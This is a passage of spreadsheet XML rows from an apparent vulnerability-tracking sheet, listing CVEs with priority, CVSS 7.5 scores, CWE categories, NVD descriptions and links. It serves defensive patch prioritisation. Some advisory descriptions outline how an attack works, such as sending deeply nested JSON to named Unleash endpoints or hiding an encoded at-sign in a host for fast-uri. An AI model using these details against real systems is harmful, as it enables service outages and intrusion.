        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62759</t>
        </is>
      </c>
    </row>
    <row r="2688">
      <c r="A2688" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2688" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62813</t>
        </is>
      </c>
      <c r="C2688" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2688" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2688" s="5" t="inlineStr"/>
      <c r="F2688" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2688" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H2688" s="5" t="inlineStr"/>
      <c r="I2688" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2688" s="5" t="inlineStr"/>
      <c r="K2688" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2688" s="5" t="inlineStr">
        <is>
          <t>Use after free in Active Directory Domain Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M2688" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62813</t>
        </is>
      </c>
    </row>
    <row r="2689">
      <c r="A2689" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2689" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6285</t>
        </is>
      </c>
      <c r="C2689" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2689" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2689" s="5" t="inlineStr"/>
      <c r="F2689" s="5" t="inlineStr"/>
      <c r="G2689" s="5" t="inlineStr"/>
      <c r="H2689" s="5" t="inlineStr"/>
      <c r="I2689" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2689" s="5" t="inlineStr"/>
      <c r="K2689" s="5" t="inlineStr">
        <is>
          <t>CWE-640</t>
        </is>
      </c>
      <c r="L2689" s="5" t="inlineStr">
        <is>
          <t>Weak Password Recovery Mechanism for Forgotten Password vulnerability in Ankaref Innovation and Technology Inc. LIBRID/LIBREF allows Password Recovery Exploitation.
This issue affects LIBRID/LIBREF: from 2.01.0.2183 through 10092026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="M2689" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6285</t>
        </is>
      </c>
    </row>
    <row r="2690">
      <c r="A2690" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2690" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62999</t>
        </is>
      </c>
      <c r="C2690" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2690" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2690" s="5" t="inlineStr"/>
      <c r="F2690" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2690" s="5" t="inlineStr"/>
      <c r="H2690" s="5" t="inlineStr"/>
      <c r="I2690" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J2690" s="5" t="inlineStr"/>
      <c r="K2690" s="5" t="inlineStr">
        <is>
          <t>CWE-180, CWE-22</t>
        </is>
      </c>
      <c r="L2690" s="5" t="inlineStr">
        <is>
          <t>Copier is a library and CLI app for rendering project templates. From 9.5.0 through 9.16.0, percent-encoded parent-directory segments or encoded path separators in a template URL can match a configured trusted repository prefix before an HTTP server or Git transport decodes the path, allowing unsafe template features from a repository outside the trusted prefix to run after user interaction. This issue is fixed in version 9.17.0.</t>
        </is>
      </c>
      <c r="M2690" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62999</t>
        </is>
      </c>
    </row>
    <row r="2691">
      <c r="A2691" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2691" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6321</t>
        </is>
      </c>
      <c r="C2691" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2691" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2691" s="5" t="inlineStr"/>
      <c r="F2691" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2691" s="5" t="inlineStr"/>
      <c r="H2691" s="5" t="inlineStr">
        <is>
          <t>openjsf:fast-uri</t>
        </is>
      </c>
      <c r="I2691" s="5" t="inlineStr">
        <is>
          <t>2026-05-04</t>
        </is>
      </c>
      <c r="J2691" s="5" t="inlineStr"/>
      <c r="K2691" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2691" s="5" t="inlineStr">
        <is>
          <t>fast-uri decoded percent-encoded path separators and dot segments before applying dot-segment removal in its normalize() and equal() functions. Encoded path data was treated like real slashes and parent-directory references, so distinct URIs could collapse onto the same normalized path. Applications that normalize or compare attacker-controlled URLs to enforce path-based policy can be bypassed, with a path that appears confined under an allowed prefix normalizing to a different location. Versions &lt;= 3.1.0 are affected. Update to 3.1.1 or later.</t>
        </is>
      </c>
      <c r="M2691" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6321</t>
        </is>
      </c>
    </row>
    <row r="2692">
      <c r="A2692" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2692" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6322</t>
        </is>
      </c>
      <c r="C2692" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2692" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2692" s="5" t="inlineStr"/>
      <c r="F2692" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2692" s="5" t="inlineStr"/>
      <c r="H2692" s="5" t="inlineStr">
        <is>
          <t>openjsf:fast-uri</t>
        </is>
      </c>
      <c r="I2692" s="5" t="inlineStr">
        <is>
          <t>2026-05-05</t>
        </is>
      </c>
      <c r="J2692" s="5" t="inlineStr"/>
      <c r="K2692" s="5" t="inlineStr">
        <is>
          <t>CWE-140, CWE-436</t>
        </is>
      </c>
      <c r="L2692" s="5" t="inlineStr">
        <is>
          <t>fast-uri normalize() decoded percent-encoded authority delimiters inside the host component and then re-emitted them as raw delimiters during serialization. A host that combined an allowed domain, an encoded at-sign, and a different domain was re-emitted with the at-sign as a raw userinfo separator, changing the URI's authority to the second domain. Applications that normalize untrusted URLs before host allowlist checks, redirect validation, or outbound request routing can be steered to a different authority than the input appeared to specify. Versions &lt;= 3.1.1 are affected. Update to 3.1.2 or later.</t>
        </is>
      </c>
      <c r="M2692" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6322</t>
        </is>
      </c>
    </row>
    <row r="2693">
      <c r="A2693" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2693" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63222</t>
        </is>
      </c>
      <c r="C2693" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2693" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2693" s="5" t="inlineStr"/>
      <c r="F2693" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2693" s="5" t="inlineStr"/>
      <c r="H2693" s="5" t="inlineStr"/>
      <c r="I2693" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J2693" s="5" t="inlineStr"/>
      <c r="K2693" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2693" s="5" t="inlineStr">
        <is>
          <t>CodeIgniter is a PHP full-stack web framework. Prior to 4.7.4, calling UploadedFile::move() without a second argument uses the client-provided filename without sanitization, allowing a remote attacker to use path traversal sequences to write uploaded content outside the intended directory when the application exposes an upload path. This issue is fixed in version 4.7.4.</t>
        </is>
      </c>
      <c r="M2693" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63222</t>
        </is>
      </c>
    </row>
    <row r="2694">
      <c r="A2694" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2694" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63408</t>
        </is>
      </c>
      <c r="C2694" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2694" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2694" s="5" t="inlineStr"/>
      <c r="F2694" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2694" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2694" s="5" t="inlineStr"/>
      <c r="I2694" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2694" s="5" t="inlineStr"/>
      <c r="K2694" s="5" t="inlineStr">
        <is>
          <t>CWE-598</t>
        </is>
      </c>
      <c r="L2694" s="5" t="inlineStr">
        <is>
          <t>Grav API Plugin is a RESTful API for Grav CMS that provides full headless access to your site's content.  Prior to 1.0.0-rc.16, the Grav API plugin JwtAuthenticator::extractBearerToken() accepts a JWT from the token URL query parameter on every /api/v1 route, including state-changing endpoints. Request URLs consequently expose valid access tokens through Apache, proxy, and CDN logs, browser history, and Referer headers, allowing a party with access to those records to reuse the token with the owner's API privileges. This issue is fixed in version 1.0.0-rc.16.</t>
        </is>
      </c>
      <c r="M2694" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63408</t>
        </is>
      </c>
    </row>
    <row r="2695">
      <c r="A2695" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2695" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63421</t>
        </is>
      </c>
      <c r="C2695" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2695" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2695" s="5" t="inlineStr"/>
      <c r="F2695" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2695" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2695" s="5" t="inlineStr"/>
      <c r="I2695" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2695" s="5" t="inlineStr"/>
      <c r="K2695" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-480</t>
        </is>
      </c>
      <c r="L2695" s="5" t="inlineStr">
        <is>
          <t>Keystone is a content management system for Node.js. Prior to 6.5.3, the findMany resolver in packages/core/src/lib/core/queries/resolvers.ts compares the signed take argument directly with graphql.maxTake, allowing a remote unauthenticated GraphQL client to provide a negative take value whose magnitude exceeds the configured bound. The bypass also applies to relationship queries and can return more records than the developer intended, potentially exhausting service resources. This issue is fixed in version 6.5.3.</t>
        </is>
      </c>
      <c r="M2695" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63421</t>
        </is>
      </c>
    </row>
    <row r="2696">
      <c r="A2696" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2696" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63462</t>
        </is>
      </c>
      <c r="C2696" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2696" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2696" s="5" t="inlineStr"/>
      <c r="F2696" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2696" s="5" t="inlineStr"/>
      <c r="H2696" s="5" t="inlineStr"/>
      <c r="I2696" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2696" s="5" t="inlineStr"/>
      <c r="K2696" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L2696" s="5" t="inlineStr">
        <is>
          <t>Unleash is an open-source feature management platform. Prior to 7.5.2, 7.6.5, and 8.0.2, the shared OpenAPI validation error path in src/lib/error/bad-data-error.ts passes a raw request value from lodash.get to JSON.stringify in genericErrorMessage and fromOpenApiValidationErrors without guarding stack exhaustion. An unauthenticated attacker can send a roughly 10 KB JSON value nested thousands of levels deep to POST /edge/validate, POST /edge/issue-token, or another OpenAPI-validated endpoint, causing RangeError: Maximum call stack size exceeded in openAPIValidationMiddleware and terminating the Node process because no uncaughtException handler recovers it. Replaying the request can sustain a complete service outage. This issue is fixed in versions 7.5.2, 7.6.5, and 8.0.2.</t>
        </is>
      </c>
      <c r="M2696" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63462</t>
        </is>
      </c>
    </row>
    <row r="2697">
      <c r="A2697" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2697" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63495</t>
        </is>
      </c>
      <c r="C2697" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2697" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2697" s="5" t="inlineStr"/>
      <c r="F2697" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2697" s="5" t="inlineStr"/>
      <c r="H2697" s="5" t="inlineStr"/>
      <c r="I2697" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J2697" s="5" t="inlineStr"/>
      <c r="K2697" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2697" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. From 2.2.0-alpha-dev until 2.2.2-alpha, the libevent WebSocket server in ws.c accumulates fragmented frames in evws-&gt;incomplete_frames without enforcing a total message-size limit. An unauthenticated remote client can repeatedly send fragmented WebSocket frames below WS_MAX_RECV_FRAME_SZ with FIN=0, causing the evbuffer to grow without bound until the process or host exhausts memory. This issue is fixed in version 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="M2697" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63495</t>
        </is>
      </c>
    </row>
    <row r="2698">
      <c r="A2698" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2698" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6377</t>
        </is>
      </c>
      <c r="C2698" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2698" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2698" s="5" t="inlineStr"/>
      <c r="F2698" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2698" s="5" t="inlineStr"/>
      <c r="H2698" s="5" t="inlineStr"/>
      <c r="I2698" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2698" s="5" t="inlineStr"/>
      <c r="K2698" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2698" s="5" t="inlineStr">
        <is>
          <t>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Next4Biz Information Technologies Inc. CSM (Customer Service Management) allows Path Traversal.
This issue affects CSM (Customer Service Management): from 6.8.9 before 8.0.3.</t>
        </is>
      </c>
      <c r="M2698" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6377</t>
        </is>
      </c>
    </row>
    <row r="2699">
      <c r="A2699" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2699" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64374</t>
        </is>
      </c>
      <c r="C2699" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2699" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2699" s="5" t="inlineStr"/>
      <c r="F2699" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2699" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2699" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2699" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J2699" s="5" t="inlineStr"/>
      <c r="K2699" s="5" t="inlineStr">
        <is>
          <t>CWE-667</t>
        </is>
      </c>
      <c r="L2699" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sched/rt: Have RT_PUSH_IPI be default off for non PREEMPT_RT
RT migration is done aggressively. When a CPU schedules out a high
priority RT task for a lower priority task, it will look to see if there's
any RT tasks that are waiting to run on another CPU that is of higher
priority than the task this CPU is about to run. If it finds one, it will
pull that task over to the CPU and allow it to run there instead.
Normally, this pulling is done by looking at the RT overloaded mask (rto)
which contains all the CPUs in the scheduler domain with RT tasks that are
waiting to run due to a higher priority RT task currently running on their
CPU. The CPU that is about to schedule a lower priority task will grab the
rq lock of the overloaded CPU and move the RT task from that CPU's runqueue
to the local one and schedule the higher priority RT task.
This caused issues when a lot of CPUs would schedule a lower priority task
at the same time. They would all try to grab the same runqueue lock of
the CPU with the overloaded RT tasks. Only the first CPU that got in will
get that task. All the others would wait until they got the runqueue lock
and see there's nothing to pull and do nothing. On systems with lots of
CPUs, this caused a large latency (up to 500us) which is beyond what
PREEMPT_RT is to allow.
The solution to that was to create an RT_PUSH_IPI logic. When any CPU
wanted to pull a task, instead of grabbing the runqueue lock of the
overloaded CPU, it would start by sending an IPI to the overloaded CPU,
and that IPI handler would have the CPU with the waiting RT task do a push
instead. Then that handler would send an IPI to the next CPU with
overloaded RT tasks, and so on. Note, after the first CPU starts this
process, if another CPU wanted to do a pull, it would see that the process
has already begun and would only increment a counter to have the IPIs
continue again.
The RT_PUSH_IPI solved the latency problem with PREEMPT_RT but could cause
a new issue with non PREEMPT_RT. Namely, softirqs run in a threaded
context on PREEMPT_RT but they can run in an interrupt context in non-RT.
If an IPI lands on a CPU that has just woken up multiple RT tasks and the
current CPU is running a non RT or a low priority RT task, instead of
doing a push, it would simply do a schedule on that CPU. But if a softirq
was also executing on this CPU, the schedule would need to wait until the
softirq finished. Until then, the CPU would still be considered overloaded
as there are RT tasks still waiting to run on it.
A live lock occurred on a workload that was doing heavy networking traffic
on a large machine where the softirqs would run 500us out of 750us. And it
would also be waking up RT tasks, causing the RT pull logic to be
constantly executed.
When a softirq triggered on a CPU with RT tasks queued but not running
yet, and the other CPUs would see this CPU as being overloaded, they would
send an IPI over to it. The CPU would notice that the waiting RT tasks are
of higher priority than the currently running task and simply schedule
that CPU instead. But because the softirq was executing, before it could
schedule, it would receive another IPI to do the same. The amount of IPIs
would slow down the currently running softirq so much that before it could
return back to task context, it would execute another softirq never
allowing the CPU to schedule. This live locked that CPU.
As RT_PUSH_IPI was created to help PREEMPT_RT, make it default off if
PREEMPT_RT is not enabled.</t>
        </is>
      </c>
      <c r="M2699" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64374</t>
        </is>
      </c>
    </row>
    <row r="2700">
      <c r="A2700" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2700" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65819</t>
        </is>
      </c>
      <c r="C2700" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2700" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2700" s="5" t="inlineStr"/>
      <c r="F2700" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2700" s="5" t="inlineStr"/>
      <c r="H2700" s="5" t="inlineStr"/>
      <c r="I2700" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2700" s="5" t="inlineStr"/>
      <c r="K2700" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-400</t>
        </is>
      </c>
      <c r="L2700" s="5" t="inlineStr">
        <is>
          <t>gopacket provides packet processing capabilities for Go. Through version 1.7.0, multiple layer decoders use attacker-controlled lengths, counts, or offsets before validating them against packet buffers, allowing a crafted packet decoded through DecodingLayerParser or DecodeFromBytes to trigger an unrecovered panic and remotely deny service.  A patch commit is available at 210f25f.</t>
        </is>
      </c>
      <c r="M2700" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65819</t>
        </is>
      </c>
    </row>
    <row r="2701">
      <c r="A2701" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2701" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65984</t>
        </is>
      </c>
      <c r="C2701" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2701" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2701" s="5" t="inlineStr"/>
      <c r="F2701" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2701" s="5" t="inlineStr"/>
      <c r="H2701" s="5" t="inlineStr"/>
      <c r="I2701" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2701" s="5" t="inlineStr"/>
      <c r="K2701" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="L2701" s="5" t="inlineStr">
        <is>
          <t>FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. In 1.3.2 and earlier, POST /api/refresh in server/api/auth/index.js falls back from current user data to decoded.groups, including when the user is deleted or groups is zero, and POST /api/heartbeat in server/api/index.js re-signs inbound JWT claims without validating the current database record. An attacker who possesses a previously issued privileged refresh cookie or access token can continue minting privileged JWTs after account deletion, disablement, role removal, or demotion. Continued refresh-cookie rotation can extend the stale session and preserve unauthorized access to user management, project manipulation, runtime configuration, scripts, and backdoor-account creation. This issue is fixed in version 1.3.3.</t>
        </is>
      </c>
      <c r="M2701" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65984</t>
        </is>
      </c>
    </row>
    <row r="2702">
      <c r="A2702" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2702" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66304</t>
        </is>
      </c>
      <c r="C2702" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2702" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2702" s="5" t="inlineStr"/>
      <c r="F2702" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2702" s="5" t="inlineStr"/>
      <c r="H2702" s="5" t="inlineStr"/>
      <c r="I2702" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2702" s="5" t="inlineStr"/>
      <c r="K2702" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2702" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Skype for Business allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2702" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66304</t>
        </is>
      </c>
    </row>
    <row r="2703">
      <c r="A2703" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2703" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66307</t>
        </is>
      </c>
      <c r="C2703" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2703" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2703" s="5" t="inlineStr"/>
      <c r="F2703" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2703" s="5" t="inlineStr"/>
      <c r="H2703" s="5" t="inlineStr"/>
      <c r="I2703" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2703" s="5" t="inlineStr"/>
      <c r="K2703" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L2703" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Skype for Business allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2703" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66307</t>
        </is>
      </c>
    </row>
    <row r="2704">
      <c r="A2704" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2704" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66373</t>
        </is>
      </c>
      <c r="C2704" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2704" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2704" s="5" t="inlineStr"/>
      <c r="F2704" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2704" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H2704" s="5" t="inlineStr"/>
      <c r="I2704" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J2704" s="5" t="inlineStr"/>
      <c r="K2704" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L2704" s="5" t="inlineStr">
        <is>
          <t>Redis before 8.8.0, in the unusual case where an authenticated attacker can execute RESTORE, allows remote code execution via a RESTORE payload where the same NACK (pending entry) is referenced by more than one consumer, because deleting both consumers via XGROUP DELCONSUMER leads to a double free. NOTE: this issue exists because of an incomplete fix for CVE-2026-25243.</t>
        </is>
      </c>
      <c r="M2704" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66373</t>
        </is>
      </c>
    </row>
    <row r="2705">
      <c r="A2705" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2705" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67376</t>
        </is>
      </c>
      <c r="C2705" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2705" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2705" s="5" t="inlineStr"/>
      <c r="F2705" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2705" s="5" t="inlineStr"/>
      <c r="H2705" s="5" t="inlineStr"/>
      <c r="I2705" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2705" s="5" t="inlineStr"/>
      <c r="K2705" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2705" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2705" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67376</t>
        </is>
      </c>
    </row>
    <row r="2706">
      <c r="A2706" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2706" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67422</t>
        </is>
      </c>
      <c r="C2706" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2706" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2706" s="5" t="inlineStr"/>
      <c r="F2706" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2706" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2706" s="5" t="inlineStr"/>
      <c r="I2706" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2706" s="5" t="inlineStr"/>
      <c r="K2706" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L2706" s="5" t="inlineStr">
        <is>
          <t>pymdown-extensions is a collection of extensions for the Python Markdown library. In versions up to and including 11.0, four inline processors (caret, tilde, betterem, and magiclink) use regular expressions whose content groups can partition a run of delimiter characters in exponentially many ways, causing catastrophic backtracking. As a result, a single untrusted Markdown line under 50 bytes rendered with markdown.markdown() in each extension's default configuration drives the rendering thread into unbounded CPU usage that grows exponentially with input length, enabling an unauthenticated remote attacker who can submit Markdown to cause denial of service. The exposure is concrete for web applications that render user-supplied Markdown (comments, wikis, issue bodies, live preview), including any app using pymdownx.extra which bundles the vulnerable betterem default, as well as hosted docs/CI systems that build untrusted Markdown. The issue has been fixed in version 11.0.1.</t>
        </is>
      </c>
      <c r="M2706" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67422</t>
        </is>
      </c>
    </row>
    <row r="2707">
      <c r="A2707" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2707" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67865</t>
        </is>
      </c>
      <c r="C2707" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2707" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
